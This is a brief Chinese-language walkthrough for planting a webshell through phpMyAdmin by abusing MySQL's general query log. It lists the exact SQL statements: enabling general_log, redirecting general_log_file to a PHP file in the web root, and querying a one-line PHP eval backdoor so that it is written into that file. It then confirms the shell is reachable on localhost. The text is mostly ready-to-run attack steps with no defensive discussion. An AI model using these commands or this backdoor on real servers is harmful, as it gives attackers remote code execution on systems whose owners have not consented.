通過 phpmyadmin getshell
general_log默認為關閉的,root權限開啟后,general_log_file會保存所有的查詢語句
可以開啟general_log,然后設置general_log_file為一個php文件,最后用一句話木馬進行查詢來獲取shell
進入phpmyadmin后在SQL處執行SQL語句
首先查看general log是否開啟
show variables like 'general_log';
general log是關閉狀態,執行SQL語句開啟general log
SET GLOBAL general_log = ON
開啟成功
然后把general_log_file設置為shell的絕對路徑
SET global general_log_file='D:/wamp/www/orange.php';
看下剛剛創建的orange.php里的內容
然后執行SQL查詢語句,寫個一句話進去。
SELECT '<?php @eval($_POST["orange"]);?>';
現在再看下orange.php里面的內容
成功插入了一句話木馬
一句話鏈接在根目錄(http://127.0.0.1/orange.php)
至此結束!
任重而道遠!